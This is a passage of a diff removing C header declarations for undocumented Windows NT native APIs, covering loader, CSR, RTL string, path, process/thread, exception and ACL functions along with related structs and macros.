_In_opt_ PULONG DllCharacteristics, - _In_ PUNICODE_STRING DllName, - _Out_opt_ PVOID *DllHandle); - -NTSYSAPI -NTSTATUS -NTAPI -LdrGetDllHandleByMapping( - _In_ PVOID BaseAddress, - _Out_ PVOID *DllHandle); - 
-NTSYSAPI -NTSTATUS -NTAPI -LdrGetDllHandleByName( - _In_opt_ PUNICODE_STRING BaseDllName, - _In_opt_ PUNICODE_STRING FullDllName, - _Out_ PVOID *DllHandle); - -NTSYSAPI -NTSTATUS -NTAPI -LdrGetDllFullName( - _In_ PVOID DllHandle, - _Out_ PUNICODE_STRING FullDllName); - -NTSYSAPI -NTSTATUS -NTAPI -LdrGetDllDirectory( - _Out_ PUNICODE_STRING DllDirectory); - -NTSYSAPI -NTSTATUS -NTAPI -LdrSetDllDirectory( - _In_ PUNICODE_STRING DllDirectory); - -NTSYSAPI -NTSTATUS -NTAPI -LdrGetProcedureAddress( - _In_ PVOID DllHandle, - _In_opt_ CONST ANSI_STRING* ProcedureName, - _In_opt_ ULONG ProcedureNumber, - _Out_ PVOID *ProcedureAddress); - -NTSYSAPI -NTSTATUS -NTAPI -LdrGetProcedureAddressForCaller( - _In_ PVOID DllHandle, - _In_opt_ PANSI_STRING ProcedureName, - _In_opt_ ULONG ProcedureNumber, - _Out_ PVOID *ProcedureAddress, - _In_ ULONG Flags, - _In_ PVOID *Callback); - -NTSYSAPI -NTSTATUS -NTAPI -LdrGetKnownDllSectionHandle( - _In_ PCWSTR DllName, - _In_ BOOLEAN KnownDlls32, - _Out_ PHANDLE Section); - -NTSYSAPI -NTSTATUS -NTAPI -LdrLoadDll( - _In_opt_ PCWSTR DllPath, - _In_opt_ PULONG DllCharacteristics, - _In_ PCUNICODE_STRING DllName, - _Out_ PVOID *DllHandle); - -NTSYSAPI -NTSTATUS -NTAPI -LdrUnloadDll( - _In_ PVOID DllHandle); - -NTSYSAPI -NTSTATUS -NTAPI -LdrQueryProcessModuleInformation( - _Out_ PRTL_PROCESS_MODULES ModuleInformation, - _In_ ULONG ModuleInformationLength, - _Out_opt_ PULONG ReturnLength); - -NTSYSAPI -NTSTATUS -NTAPI -LdrRegisterDllNotification( - _In_ ULONG Flags, - _In_ PLDR_DLL_NOTIFICATION_FUNCTION NotificationFunction, - _In_opt_ PVOID Context, - _Out_ PVOID *Cookie); - -NTSYSAPI -NTSTATUS -NTAPI -LdrUnregisterDllNotification( - _In_ PVOID Cookie); - -NTSYSAPI -NTSTATUS -NTAPI -LdrResSearchResource( - _In_ PVOID File, - _In_ CONST ULONG_PTR* ResIds, - _In_ ULONG ResIdCount, - _In_ ULONG Flags, - _Out_ LPVOID *Resource, - _Out_ ULONG_PTR *Size, - _In_opt_ USHORT *FoundLanguage, - _In_opt_ ULONG *FoundLanguageLength); - -NTSYSAPI -NTSTATUS 
-NTAPI
-LdrOpenImageFileOptionsKey(
- _In_ PCUNICODE_STRING ImagePathName,
- _In_ BOOLEAN Wow64Path,
- _Out_ PHANDLE KeyHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrQueryImageFileExecutionOptions(
- _In_ PCUNICODE_STRING ImagePathName,
- _In_ PCWSTR OptionName,
- _In_ ULONG Type,
- _Out_ PVOID Buffer,
- _In_ ULONG BufferSize,
- _Out_opt_ PULONG ResultSize);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrQueryImageFileExecutionOptionsEx(
- _In_ PCUNICODE_STRING ImagePathName,
- _In_ PCWSTR OptionName,
- _In_ ULONG Type,
- _Out_ PVOID Buffer,
- _In_ ULONG BufferSize,
- _Out_opt_ PULONG ResultSize,
- _In_ BOOLEAN Wow64Path);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrQueryImageFileKeyOption(
- _In_ HANDLE KeyHandle,
- _In_ PCWSTR OptionName,
- _In_ ULONG Type,
- _Out_ PVOID Buffer,
- _In_ ULONG BufferSize,
- _Out_opt_ PULONG ResultSize);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrDisableThreadCalloutsForDll(
- _In_ PVOID DllImageBase);
-
-#define LDR_LOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001
-#define LDR_LOCK_LOADER_LOCK_FLAG_TRY_ONLY 0x00000002
-
-#define LDR_LOCK_LOADER_LOCK_DISPOSITION_INVALID 0x00000000
-#define LDR_LOCK_LOADER_LOCK_DISPOSITION_LOCK_ACQUIRED 0x00000001
-#define LDR_LOCK_LOADER_LOCK_DISPOSITION_LOCK_NOT_ACQUIRED 0x00000002
-
-#define LDR_UNLOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrLockLoaderLock(
- _In_ ULONG Flags,
- _Out_opt_ ULONG *Disposition,
- _Out_ PVOID *Cookie);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrUnlockLoaderLock(
- _In_ ULONG Flags,
- _Inout_ PVOID Cookie);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrRelocateImage(
- _In_ PVOID NewBase,
- _In_ PSTR LoaderName,
- _In_ NTSTATUS Success,
- _In_ NTSTATUS Conflict,
- _In_ NTSTATUS Invalid);
-
-NTSYSAPI
-PIMAGE_BASE_RELOCATION
-NTAPI
-LdrProcessRelocationBlock(
- _In_ ULONG_PTR VA,
- _In_ ULONG SizeOfBlock,
- _In_ PUSHORT NextOffset,
- _In_ LONG_PTR Diff);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrShutdownProcess(
- VOID);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrShutdownThread(
- VOID);
-
-NTSYSAPI
-BOOLEAN
-NTAPI -LdrControlFlowGuardEnforced( - VOID); - -/* -** LDR END -*/ - -typedef struct _HANDLEENTRY { - PHEAD phead; // Pointer to the Object. - PVOID pOwner; // PTI or PPI - BYTE bType; // Object handle type - BYTE bFlags; // Flags - WORD wUniq; // Access count. -} HANDLEENTRY, *PHANDLEENTRY; - -typedef struct _SERVERINFO { - WORD wRIPFlags; - WORD wSRVIFlags; - WORD wRIPPID; - WORD wRIPError; - ULONG cHandleEntries; - // incomplete -} SERVERINFO, *PSERVERINFO; - -typedef struct _SHAREDINFO { - PSERVERINFO psi; - PHANDLEENTRY aheList; - ULONG HeEntrySize; - // incomplete -} SHAREDINFO, *PSHAREDINFO; - -typedef struct _USERCONNECT { - ULONG ulVersion; - ULONG ulCurrentVersion; - DWORD dwDispatchCount; - SHAREDINFO siClient; -} USERCONNECT, *PUSERCONNECT; - -/* -** Runtime Library API START -*/ - -/************************************************************************************ -* -* CSR API. -* -************************************************************************************/ - -NTSYSAPI -ULONG -NTAPI -CsrGetProcessId( - VOID); - -NTSYSAPI -NTSTATUS -NTAPI -CsrClientConnectToServer( - _In_ PWSTR ObjectDirectory, - _In_ ULONG ServerDllIndex, - _Inout_ PVOID ConnectionInformation, - _Inout_ ULONG *ConnectionInformationLength, - _Out_ PBOOLEAN CalledFromServer); - -/************************************************************************************ -* -* RTL Strings API. 
-*
-************************************************************************************/
-
-#ifndef RtlInitEmptyUnicodeString
-#define RtlInitEmptyUnicodeString(_ucStr,_buf,_bufSize) \
- ((_ucStr)->Buffer = (_buf), \
- (_ucStr)->Length = 0, \
- (_ucStr)->MaximumLength = (USHORT)(_bufSize))
-#endif
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlCreateUnicodeString(
- _Out_ PUNICODE_STRING DestinationString,
- _In_ PCWSTR SourceString);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlCreateUnicodeStringFromAsciiz(
- _Out_ PUNICODE_STRING DestinationString,
- _In_ PSTR SourceString);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlInitString(
- _Inout_ PSTRING DestinationString,
- _In_ PCSZ SourceString);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlInitUnicodeString(
- _Out_ PUNICODE_STRING DestinationString,
- _In_opt_ PCWSTR SourceString);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlInitUnicodeStringEx(
- _Out_ PUNICODE_STRING DestinationString,
- _In_opt_ PWSTR SourceString);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlEqualUnicodeString(
- _In_ PCUNICODE_STRING String1,
- _In_ PCUNICODE_STRING String2,
- _In_ BOOLEAN CaseInSensitive);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDuplicateUnicodeString(
- _In_ ULONG Flags,
- _In_ PUNICODE_STRING StringIn,
- _Out_ PUNICODE_STRING StringOut);
-
-NTSYSAPI
-WCHAR
-NTAPI
-RtlUpcaseUnicodeChar(
- _In_ WCHAR SourceCharacter);
-
-NTSYSAPI
-WCHAR
-NTAPI
-RtlDowncaseUnicodeChar(
- _In_ WCHAR SourceCharacter);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlIsNameInExpression(
- _In_ PUNICODE_STRING Expression,
- _In_ PUNICODE_STRING Name,
- _In_ BOOLEAN IgnoreCase,
- _In_opt_ PWCH UpcaseTable);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlStringFromGUID(
- _In_ GUID *Guid,
- _Out_ PUNICODE_STRING GuidString);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGUIDFromString(
- _In_ PUNICODE_STRING GuidString,
- _Out_ GUID *Guid);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlPrefixUnicodeString(
- _In_ PCUNICODE_STRING String1,
- _In_ PCUNICODE_STRING String2,
- _In_ BOOLEAN CaseInSensitive);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlExpandEnvironmentStrings(
- _In_opt_ PVOID Environment,
- _In_reads_(SrcLength) PWSTR Src,
- _In_ SIZE_T SrcLength,
- _Out_writes_opt_(DstLength) PWSTR Dst,
- _In_ SIZE_T DstLength,
- _Out_opt_ PSIZE_T ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlExpandEnvironmentStrings_U(
- _In_opt_ PVOID Environment,
- _In_ PCUNICODE_STRING Source,
- _Out_ PUNICODE_STRING Destination,
- _Out_opt_ PULONG ReturnedLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlFormatCurrentUserKeyPath(
- _Out_ PUNICODE_STRING CurrentUserKeyPath);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlFreeUnicodeString(
- _In_ PUNICODE_STRING UnicodeString);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlEraseUnicodeString(
- _Inout_ PUNICODE_STRING String);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlFreeAnsiString(
- _In_ PANSI_STRING AnsiString);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAnsiStringToUnicodeString(
- _Out_ PUNICODE_STRING DestinationString,
- _In_ PCANSI_STRING SourceString,
- _In_ BOOLEAN AllocateDestinationString);
-
-NTSYSAPI
-WCHAR
-NTAPI
-RtlAnsiCharToUnicodeChar(
- _Inout_ PUCHAR *SourceCharacter);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlUnicodeToMultiByteSize(
- _Out_ PULONG BytesInMultiByteString,
- _In_reads_bytes_(BytesInUnicodeString) PWCH UnicodeString,
- _In_ ULONG BytesInUnicodeString);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlDosPathNameToNtPathName_U(
- _In_ PCWSTR DosFileName,
- _Out_ PUNICODE_STRING NtFileName,
- _Out_opt_ PWSTR *FilePart,
- _Reserved_ PVOID Reserved);
-
-NTSYSAPI
-PWSTR
-NTAPI
-RtlIpv4AddressToStringW(
- _In_ const struct in_addr *Addr,
- _Out_ PWSTR S);
-
-NTSYSAPI
-LONG
-NTAPI
-RtlCompareUnicodeStrings(
- _In_reads_(String1Length) PWCHAR String1,
- _In_ SIZE_T String1Length,
- _In_reads_(String2Length) PWCHAR String2,
- _In_ SIZE_T String2Length,
- _In_ BOOLEAN CaseInSensitive);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlCopyString(
- _In_ PSTRING DestinationString,
- _In_opt_ PSTRING SourceString);
-
-NTSYSAPI
-CHAR
-NTAPI
-RtlUpperChar(
- _In_ CHAR Character);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlUpperString(
- _In_ PSTRING DestinationString,
- _In_ PSTRING SourceString);
-
-//
-// preallocated 
heap-growable buffers -// -typedef struct _RTL_BUFFER { - PUCHAR Buffer; - PUCHAR StaticBuffer; - SIZE_T Size; - SIZE_T StaticSize; - SIZE_T ReservedForAllocatedSize; // for future doubling - PVOID ReservedForIMalloc; // for future pluggable growth -} RTL_BUFFER, *PRTL_BUFFER; - -typedef struct _RTL_UNICODE_STRING_BUFFER { - UNICODE_STRING String; - RTL_BUFFER ByteBuffer; - UCHAR MinimumStaticBufferForTerminalNul[sizeof(WCHAR)]; -} RTL_UNICODE_STRING_BUFFER, *PRTL_UNICODE_STRING_BUFFER; - -// -// These are OUT Disposition values. -// -#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_AMBIGUOUS (0x00000001) -#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_UNC (0x00000002) -#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_DRIVE (0x00000003) -#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_ALREADY_DOS (0x00000004) - -NTSYSAPI -NTSTATUS -NTAPI -RtlNtPathNameToDosPathName( - _In_ ULONG Flags, - _Inout_ PRTL_UNICODE_STRING_BUFFER Path, - _Out_opt_ PULONG Disposition, - _Inout_opt_ PWSTR* FilePart); - -NTSYSAPI -ULONG -NTAPI -RtlIsDosDeviceName_U( - _In_ PCWSTR DosFileName); - -NTSYSAPI -ULONG -NTAPI -RtlGetFullPathName_U( - _In_ PCWSTR lpFileName, - _In_ ULONG nBufferLength, - _Out_writes_bytes_(nBufferLength) PWSTR lpBuffer, - _Out_opt_ PWSTR *lpFilePart); - -NTSYSAPI -BOOLEAN -NTAPI -RtlGetSearchPath( - _Out_ PWSTR *SearchPath); - -typedef enum _RTL_PATH_TYPE { - RtlPathTypeUnknown, // 0 - RtlPathTypeUncAbsolute, // 1 - RtlPathTypeDriveAbsolute, // 2 - RtlPathTypeDriveRelative, // 3 - RtlPathTypeRooted, // 4 - RtlPathTypeRelative, // 5 - RtlPathTypeLocalDevice, // 6 - RtlPathTypeRootLocalDevice // 7 -} RTL_PATH_TYPE; - -NTSYSAPI -RTL_PATH_TYPE -NTAPI -RtlDetermineDosPathNameType_U( - _In_ PCWSTR DosFileName); - -#define HASH_STRING_ALGORITHM_DEFAULT (0) -#define HASH_STRING_ALGORITHM_X65599 (1) -#define HASH_STRING_ALGORITHM_INVALID (0xffffffff) - -NTSYSAPI -NTSTATUS -NTAPI -RtlHashUnicodeString( - _In_ const UNICODE_STRING *String, - _In_ BOOLEAN CaseInSensitive, - _In_ ULONG HashAlgorithm, - 
_Out_ PULONG HashValue);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAppendUnicodeStringToString(
- _In_ PUNICODE_STRING Destination,
- _In_ PUNICODE_STRING Source);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAppendUnicodeToString(
- _In_ PUNICODE_STRING Destination,
- _In_opt_ PWSTR Source);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlCopyUnicodeString(
- _In_ PUNICODE_STRING DestinationString,
- _In_ PUNICODE_STRING SourceString);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlUpcaseUnicodeString(
- _Inout_ PUNICODE_STRING DestinationString,
- _In_ PUNICODE_STRING SourceString,
- _In_ BOOLEAN AllocateDestinationString);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDowncaseUnicodeString(
- _Inout_ PUNICODE_STRING DestinationString,
- _In_ PUNICODE_STRING SourceString,
- _In_ BOOLEAN AllocateDestinationString);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlEraseUnicodeString(
- _Inout_ PUNICODE_STRING String);
-
-#define RTL_ENSURE_BUFFER_SIZE_NO_COPY (0x00000001)
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlpEnsureBufferSize(
- _In_ ULONG Flags,
- _Inout_ PRTL_BUFFER Buffer,
- _In_ SIZE_T NewSizeBytes);
-
-#define RtlInitBuffer(Buff, StatBuff, StatSize) \
- do { \
- (Buff)->Buffer = (StatBuff); \
- (Buff)->Size = (StatSize); \
- (Buff)->StaticBuffer = (StatBuff); \
- (Buff)->StaticSize = (StatSize); \
- } while (0)
-
-#define RtlEnsureBufferSize(Flags, Buff, NewSizeBytes) \
- ( ((Buff) != NULL && (NewSizeBytes) <= (Buff)->Size) \
- ? STATUS_SUCCESS \
- : RtlpEnsureBufferSize((Flags), (Buff), (NewSizeBytes)) \
- )
-
-#define RtlFreeBuffer(Buff) \
- do { \
- if ((Buff) != NULL && (Buff)->Buffer != NULL) { \
- if (RTLP_BUFFER_IS_HEAP_ALLOCATED(Buff)) { \
- UNICODE_STRING UnicodeString; \
- UnicodeString.Buffer = (PWSTR)(PVOID)(Buff)->Buffer; \
- RtlFreeUnicodeString(&UnicodeString); \
- } \
- (Buff)->Buffer = (Buff)->StaticBuffer; \
- (Buff)->Size = (Buff)->StaticSize; \
- } \
- } while (0)
-
-/************************************************************************************
-*
-* RTL Process/Thread API. 
-* -************************************************************************************/ - -typedef NTSTATUS(*PUSER_PROCESS_START_ROUTINE)( - PRTL_USER_PROCESS_PARAMETERS ProcessParameters - ); - -typedef NTSTATUS(*PUSER_THREAD_START_ROUTINE)( - PVOID ThreadParameter - ); - -typedef struct _RTL_USER_PROCESS_INFORMATION { - ULONG Length; - HANDLE Process; - HANDLE Thread; - CLIENT_ID ClientId; - SECTION_IMAGE_INFORMATION ImageInformation; -} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION; - -// -// This structure is used only by Wow64 processes. The offsets -// of structure elements should the same as viewed by a native Win64 application. -// -typedef struct _RTL_USER_PROCESS_INFORMATION64 { - ULONG Length; - LONGLONG Process; - LONGLONG Thread; - CLIENT_ID64 ClientId; - SECTION_IMAGE_INFORMATION64 ImageInformation; -} RTL_USER_PROCESS_INFORMATION64, *PRTL_USER_PROCESS_INFORMATION64; - -NTSYSAPI -NTSTATUS -STDAPIVCALLTYPE -RtlSetProcessIsCritical( - _In_ BOOLEAN NewValue, - _Out_opt_ PBOOLEAN OldValue, - _In_ BOOLEAN CheckFlag); - -NTSYSAPI -NTSTATUS -STDAPIVCALLTYPE -RtlSetThreadIsCritical( - _In_ BOOLEAN NewValue, - _Out_opt_ PBOOLEAN OldValue, - _In_ BOOLEAN CheckFlag); - -NTSYSAPI -NTSTATUS -NTAPI -RtlCreateEnvironment( - _In_ BOOLEAN CloneCurrentEnvironment, - _Out_ PVOID *Environment); - -NTSYSAPI -NTSTATUS -NTAPI -RtlCreateEnvironmentEx( - _In_ PVOID SourceEnv, - _Out_ PVOID *Environment, - _In_ ULONG Flags); - -NTSYSAPI -NTSTATUS -NTAPI -RtlSetCurrentEnvironment( - _In_ PVOID Environment, - _Out_opt_ PVOID *PreviousEnvironment); - -NTSYSAPI -NTSTATUS -NTAPI -RtlQueryEnvironmentVariable_U( - _In_opt_ PVOID Environment, - _In_ PUNICODE_STRING Name, - _Out_ PUNICODE_STRING Value); - -NTSYSAPI -NTSTATUS -NTAPI -RtlDestroyEnvironment( - _In_ PVOID Environment); - -NTSYSAPI -NTSTATUS -NTAPI -RtlCreateProcessParameters( - _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters, - _In_ PUNICODE_STRING ImagePathName, - _In_opt_ PUNICODE_STRING DllPath, 
- _In_opt_ PUNICODE_STRING CurrentDirectory,
- _In_opt_ PUNICODE_STRING CommandLine,
- _In_opt_ PVOID Environment,
- _In_opt_ PUNICODE_STRING WindowTitle,
- _In_opt_ PUNICODE_STRING DesktopInfo,
- _In_opt_ PUNICODE_STRING ShellInfo,
- _In_opt_ PUNICODE_STRING RuntimeData);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDestroyProcessParameters(
- _In_ PRTL_USER_PROCESS_PARAMETERS ProcessParameters);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCreateProcessParametersEx(
- _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,
- _In_ PUNICODE_STRING ImagePathName,
- _In_opt_ PUNICODE_STRING DllPath,
- _In_opt_ PUNICODE_STRING CurrentDirectory,
- _In_opt_ PUNICODE_STRING CommandLine,
- _In_opt_ PVOID Environment,
- _In_opt_ PUNICODE_STRING WindowTitle,
- _In_opt_ PUNICODE_STRING DesktopInfo,
- _In_opt_ PUNICODE_STRING ShellInfo,
- _In_opt_ PUNICODE_STRING RuntimeData,
- _In_ ULONG Flags);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCreateUserProcess(
- _In_ PUNICODE_STRING NtImagePathName,
- _In_ ULONG Attributes,
- _In_ PRTL_USER_PROCESS_PARAMETERS ProcessParameters,
- _In_opt_ PSECURITY_DESCRIPTOR ProcessSecurityDescriptor,
- _In_opt_ PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,
- _In_opt_ HANDLE ParentProcess,
- _In_ BOOLEAN InheritHandles,
- _In_opt_ HANDLE DebugPort,
- _In_opt_ HANDLE ExceptionPort,
- _Out_ PRTL_USER_PROCESS_INFORMATION ProcessInformationn);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCreateUserThread(
- _In_ HANDLE Process,
- _In_opt_ PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,
- _In_ BOOLEAN CreateSuspended,
- _In_ ULONG StackZeroBits,
- _In_opt_ SIZE_T MaximumStackSize,
- _In_opt_ SIZE_T InitialStackSize,
- _In_ PUSER_THREAD_START_ROUTINE StartAddress,
- _In_opt_ PVOID Parameter,
- _Out_opt_ PHANDLE Thread,
- _Out_opt_ PCLIENT_ID ClientId);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlExitUserThread(
- _In_ NTSTATUS ExitStatus);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlExitUserProcess(
- _In_ NTSTATUS ExitStatus);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlFreeUserThreadStack(
- _In_ HANDLE hProcess,
- _In_ HANDLE hThread); 
-
-NTSYSAPI
-VOID
-NTAPI
-RtlPushFrame(
- _In_ PTEB_ACTIVE_FRAME Frame);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlPopFrame(
- _In_ PTEB_ACTIVE_FRAME Frame);
-
-NTSYSAPI
-PTEB_ACTIVE_FRAME
-NTAPI
-RtlGetFrame(
- VOID);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlEncodePointer(
- _In_ PVOID Ptr);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlDecodePointer(
- _In_ PVOID Ptr);
-
-/************************************************************************************
-*
-* RTL Memory Buffer API.
-*
-************************************************************************************/
-
-NTSYSAPI
-SIZE_T
-NTAPI
-RtlCompareMemoryUlong(
- _In_ PVOID Source,
- _In_ SIZE_T Length,
- _In_ ULONG Pattern);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlFillMemoryUlong(
- _Out_ PVOID Destination,
- _In_ SIZE_T Length,
- _In_ ULONG Pattern);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlFillMemoryUlonglong(
- _Out_ PVOID Destination,
- _In_ SIZE_T Length,
- _In_ ULONGLONG Pattern);
-
-/************************************************************************************
-*
-* RTL PEB API.
-*
-************************************************************************************/
-
-NTSYSAPI
-PPEB
-NTAPI
-RtlGetCurrentPeb(
- VOID);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlAcquirePebLock(
- VOID);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlReleasePebLock(
- VOID);
-
-/************************************************************************************
-*
-* RTL Exception Handling API. 
-*
-************************************************************************************/
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlAddVectoredExceptionHandler(
- _In_ ULONG First,
- _In_ PVECTORED_EXCEPTION_HANDLER Handler);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlRemoveVectoredExceptionHandler(
- _In_ PVOID Handle);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlDispatchException(
- _In_ PEXCEPTION_RECORD ExceptionRecord,
- _In_ PCONTEXT ContextRecord);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlAddVectoredContinueHandler(
- _In_ ULONG First,
- _In_ PVECTORED_EXCEPTION_HANDLER Handler);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlRemoveVectoredContinueHandler(
- _In_ PVOID Handle);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlRaiseException(
- _In_ PEXCEPTION_RECORD ExceptionRecord);
-
-NTSYSAPI
-DECLSPEC_NORETURN
-VOID
-NTAPI
-RtlRaiseStatus(
- _In_ NTSTATUS Status);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtContinue(
- _In_ PCONTEXT ContextRecord,
- _In_ BOOLEAN TestAlert);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtRaiseException(
- _In_ PEXCEPTION_RECORD ExceptionRecord,
- _In_ PCONTEXT ContextRecord,
- _In_ BOOLEAN FirstChance);
-
-/************************************************************************************
-*
-* RTL Security API. 
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetOwnerSecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
- _Out_ PSID *Owner,
- _Out_ PBOOLEAN OwnerDefaulted);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetGroupSecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
- _Out_ PSID *Group,
- _Out_ PBOOLEAN GroupDefaulted);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetDaclSecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
- _Out_ PBOOLEAN DaclPresent,
- _Out_ PACL *Dacl,
- _Out_ PBOOLEAN DaclDefaulted);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetSaclSecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
- _Out_ PBOOLEAN SaclPresent,
- _Out_ PACL *Sacl,
- _Out_ PBOOLEAN SaclDefaulted);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCreateAcl(
- _Out_writes_bytes_(AclLength) PACL Acl,
- _In_ ULONG AclLength,
- _In_ ULONG AclRevision);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlValidAcl(
- _In_ PACL Acl);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlQueryInformationAcl(
- _In_ PACL Acl,
- _Out_writes_bytes_(AclInformationLength) PVOID AclInformation,
- _In_ ULONG AclInformationLength,
- _In_ ACL_INFORMATION_CLASS AclInformationClass);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlSetInformationAcl(
- _Inout_ PACL Acl,
- _In_reads_bytes_(AclInformationLength) PVOID AclInformation,
- _In_ ULONG AclInformationLength,
- _In_ ACL_INFORMATION_CLASS AclInformationClass);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG StartingAceIndex,
- _In_reads_bytes_(AceListLength) PVOID AceList,
- _In_ ULONG AceListLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDeleteAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceIndex);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetAce(
- _In_ PACL Acl,
- _In_ ULONG AceIndex,
- _Outptr_ PVOID *Ace);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlFirstFreeAce(
- _In_ PACL Acl,
- _Out_ PVOID *FirstFree);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlOwnerAcesPresent(
- _In_ PACL pAcl);
-
-NTSYSAPI 
-NTSTATUS
-NTAPI
-RtlAddAccessAllowedAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ACCESS_MASK AccessMask,
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAccessAllowedAceEx(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG AceFlags,
- _In_ ACCESS_MASK AccessMask,
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAccessDeniedAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ACCESS_MASK AccessMask,
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAccessDeniedAceEx(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG AceFlags,
- _In_ ACCESS_MASK AccessMask,
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAuditAccessAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ACCESS_MASK AccessMask,
- _In_ PSID Sid,
- _In_ BOOLEAN AuditSuccess,
- _In_ BOOLEAN AuditFailure);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAuditAccessAceEx(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG AceFlags,
- _In_ ACCESS_MASK AccessMask,
- _In_ PSID Sid,
- _In_ BOOLEAN AuditSuccess,
- _In_ BOOLEAN AuditFailure);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
